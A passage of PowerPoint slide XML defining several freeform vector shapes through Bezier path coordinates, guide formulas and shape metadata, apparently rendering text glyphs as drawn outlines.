            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2543175" y="2574925"/>
              <a:ext cx="85725" cy="128588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 206"/>
                <a:gd name="T1" fmla="*/ 34 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 17 h 249"/>
                <a:gd name="T4" fmla="*/ 188 w 206"/>
                <a:gd name="T5" fmla="*/ 0 h 249"/>
                <a:gd name="T6" fmla="*/ 175 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 11 w 206"/>
                <a:gd name="T9" fmla="*/ 108 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 125 h 249"/>
                <a:gd name="T12" fmla="*/ 9 w 206"/>
                <a:gd name="T13" fmla="*/ 140 h 249"/>
                <a:gd name="T14" fmla="*/ 175 w 206"/>
                <a:gd name="T15" fmla="*/ 245 h 249"/>
                <a:gd name="T16" fmla="*/ 188 w 206"/>
                <a:gd name="T17" fmla="*/ 249 h 249"/>
                <a:gd name="T18" fmla="*/ 206 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 194 w 206"/>
                <a:gd name="T21" fmla="*/ 215 h 249"/>
                <a:gd name="T22" fmla="*/ 51 w 206"/>
                <a:gd name="T23" fmla="*/ 125 h 249"/>
                <a:gd name="T24" fmla="*/ 194 w 206"/>
                <a:gd name="T25" fmla="*/ 3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49">
                  <a:moveTo>
                    <a:pt x="194" y="34"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="31"/>
                    <a:pt x="206" y="27"/>
                    <a:pt x="206" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="188" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="0"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="175" y="5"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11" y="108"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="111"/>
                    <a:pt x="0" y="115"/>
                    <a:pt x="0" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="131"/>
                    <a:pt x="4" y="137"/>
                    <a:pt x="9" y="140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="175" y="245"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="249"/>
                    <a:pt x="184" y="249"/>
                    <a:pt x="188" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="249"/>
                    <a:pt x="206" y="244"/>
                    <a:pt x="206" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="223"/>
                    <a:pt x="199" y="219"/>
                    <a:pt x="194" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="51" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="3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64" name="Freeform 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F88F9E-F3F8-4568-AE61-D5F6CD9E84AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId102"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2657475" y="2605088"/>
              <a:ext cx="80963" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 30 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 160 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 222"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 162 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 222"/>
                <a:gd name="T32" fmla="*/ 17 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 154 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 33 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="84"/>
                    <a:pt x="30" y="78"/>
                    <a:pt x="30" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="46"/>
                    <a:pt x="46" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="160" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="52" y="113"/>
                    <a:pt x="98" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="162" y="131"/>
                    <a:pt x="162" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="176"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="192"/>
                    <a:pt x="47" y="187"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="139"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="17" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="222"/>
                    <a:pt x="27" y="222"/>
                    <a:pt x="33" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="84" y="222"/>
                    <a:pt x="98" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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65" name="Freeform 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88AF5AEE-2BD8-4823-AAC0-BA93A90F71DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId103"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2767013" y="2605088"/>
              <a:ext cx="84138" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 34 w 196"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 146 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 167 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 112 h 222"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="169"/>
                    <a:pt x="150" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="146" y="30"/>
                    <a:pt x="146" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="156" y="59"/>
                    <a:pt x="167" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="174"/>
                    <a:pt x="196"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66" name="Freeform 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14EC5191-974E-4BDD-BD3A-A4DEEC4B29BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId104"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2870200" y="2605088"/>
              <a:ext cx="95250" cy="112713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 126 h 218"/>
                <a:gd name="T2" fmla="*/ 185 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 180 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 171 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="193" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="95" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="218"/>
                    <a:pt x="171" y="218"/>
                    <a:pt x="171" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="188"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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67" name="Freeform 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44589A3D-D0AB-4CEF-9FAD-7CB8F5059460}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId105"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2989263" y="2560638"/>
              <a:ext cx="80963" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 116 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 96 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 116 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 116 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 116 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 91 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 66 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 91 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 116 w 188"/>
                <a:gd name="T39" fmla="*/ 2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6" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="95"/>
                    <a:pt x="113" y="90"/>
                    <a:pt x="96" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="25" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="21" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="176" y="275"/>
                    <a:pt x="168" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="11"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="91" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="66" y="11"/>
                    <a:pt x="66" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="39"/>
                    <a:pt x="77" y="50"/>
                    <a:pt x="91" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="50"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116"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68" name="Freeform 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C88B21-168F-4BC9-AC2D-42E840E8E872}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId106"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3086100" y="2605088"/>
              <a:ext cx="101600" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 237"/>
                <a:gd name="T1" fmla="*/ 87 h 329"/>
                <a:gd name="T2" fmla="*/ 137 w 237"/>
                <a:gd name="T3" fmla="*/ 31 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 111 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 191 h 329"/>
                <a:gd name="T8" fmla="*/ 77 w 237"/>
                <a:gd name="T9" fmla="*/ 123 h 329"/>
                <a:gd name="T10" fmla="*/ 77 w 237"/>
                <a:gd name="T11" fmla="*/ 87 h 329"/>
                <a:gd name="T12" fmla="*/ 77 w 237"/>
                <a:gd name="T13" fmla="*/ 196 h 329"/>
                <a:gd name="T14" fmla="*/ 135 w 237"/>
                <a:gd name="T15" fmla="*/ 221 h 329"/>
                <a:gd name="T16" fmla="*/ 237 w 237"/>
                <a:gd name="T17" fmla="*/ 111 h 329"/>
                <a:gd name="T18" fmla="*/ 140 w 237"/>
                <a:gd name="T19" fmla="*/ 0 h 329"/>
                <a:gd name="T20" fmla="*/ 77 w 237"/>
                <a:gd name="T21" fmla="*/ 25 h 329"/>
                <a:gd name="T22" fmla="*/ 57 w 237"/>
                <a:gd name="T23" fmla="*/ 3 h 329"/>
                <a:gd name="T24" fmla="*/ 21 w 237"/>
                <a:gd name="T25" fmla="*/ 3 h 329"/>
                <a:gd name="T26" fmla="*/ 0 w 237"/>
                <a:gd name="T27" fmla="*/ 19 h 329"/>
                <a:gd name="T28" fmla="*/ 20 w 237"/>
                <a:gd name="T29" fmla="*/ 34 h 329"/>
                <a:gd name="T30" fmla="*/ 42 w 237"/>
                <a:gd name="T31" fmla="*/ 34 h 329"/>
                <a:gd name="T32" fmla="*/ 42 w 237"/>
                <a:gd name="T33" fmla="*/ 299 h 329"/>
                <a:gd name="T34" fmla="*/ 21 w 237"/>
                <a:gd name="T35" fmla="*/ 299 h 329"/>
                <a:gd name="T36" fmla="*/ 0 w 237"/>
                <a:gd name="T37" fmla="*/ 314 h 329"/>
                <a:gd name="T38" fmla="*/ 20 w 237"/>
                <a:gd name="T39" fmla="*/ 329 h 329"/>
                <a:gd name="T40" fmla="*/ 99 w 237"/>
                <a:gd name="T41" fmla="*/ 329 h 329"/>
                <a:gd name="T42" fmla="*/ 119 w 237"/>
                <a:gd name="T43" fmla="*/ 314 h 329"/>
                <a:gd name="T44" fmla="*/ 99 w 237"/>
                <a:gd name="T45" fmla="*/ 299 h 329"/>
                <a:gd name="T46" fmla="*/ 77 w 237"/>
                <a:gd name="T47" fmla="*/ 299 h 329"/>
                <a:gd name="T48" fmla="*/ 77 w 237"/>
                <a:gd name="T49" fmla="*/ 19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 h="329">
                  <a:moveTo>
                    <a:pt x="77" y="87"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="57"/>
                    <a:pt x="106" y="31"/>
                    <a:pt x="137" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="31"/>
                    <a:pt x="203" y="67"/>
                    <a:pt x="203" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
